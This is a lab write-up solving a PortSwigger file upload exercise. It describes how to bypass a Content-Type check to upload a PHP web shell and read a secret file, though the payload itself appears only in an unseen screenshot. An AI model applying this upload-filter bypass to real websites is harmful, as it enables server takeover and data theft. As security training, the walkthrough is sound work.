Introduction
Hello guys, how are you all? This is our second article about file upload vulnerabilities. In this article, we will upload a web shell via Content-type restriction bypass.
This means that in this lab when we upload our malicious file in .php format, we will receive an error from the server stating that we can only upload jpeg/png type files. We will intercept the simple request, convert the Content-Type to image/jpe, and add our payload.
In the lab description, we were told that the file upload function of this lab is vulnerable and we have to exploit it to access the /home/carlos/secret file. Credentials have already been provided to us which are wiener:peter for Web shell upload.
Lab Description
Here is the lab description. As you may know, these are PortSwigger Web Security Labs that we are solving.
To begin with the lab, we need to first access it and login. Once we have logged in, we need to enable Burp’s proxy. After enabling the proxy, upload any simple image. After uploading the image, analyze the HTTP history in the proxy tab.
Exploiting the Vulnerability
As you can see, we have 2 important requests. One is a post-based request in which we have uploaded our sample.png image. The other request is a get-based request that simply tells us the location of our image on the server in Web shell upload.
We will send both of these requests to the repeater tab. We will name the post-based request “UploadImage” and the get-based request “ShowImage”.
If you remember, I told you earlier that when we try to upload our exploit.php file in this lab, it will not upload because of the restrictions set by the server. However, there are two ways to solve this issue in this lab. The first method is to intercept the request when you directly add the myexploit.php file and change its content type to image/png or image/jpeg.
In my case, I am not doing anything because I am tricking the server here. I have already uploaded an image named “sample.png” on the server, which is post-based. I am modifying that request.
Firstly, I will modify the name “filename = ‘sample.png'” to “filename = ‘myexploit.php'”.
After that, I will remove all the raw data or image data that we have under Content-type.
After removing it, I simply inserted my PHP payload, which is the objective of our lab. Because in this lab, we are accessing the /home/carlos/secret file.
This is the payload I have inserted above. Now I will submit this request.
After submitting the request, I will simply switch to my second tab which is ShowImage.
If you remember, we submitted the payload with the name “myexploit.php”. We simply replaced “simple.png” with “myexploit.php” in the payload. After submitting it, we will get the secret key which can be seen in the screenshot above.
After submitting the key, you can see that we have solved the lab. Congratulations!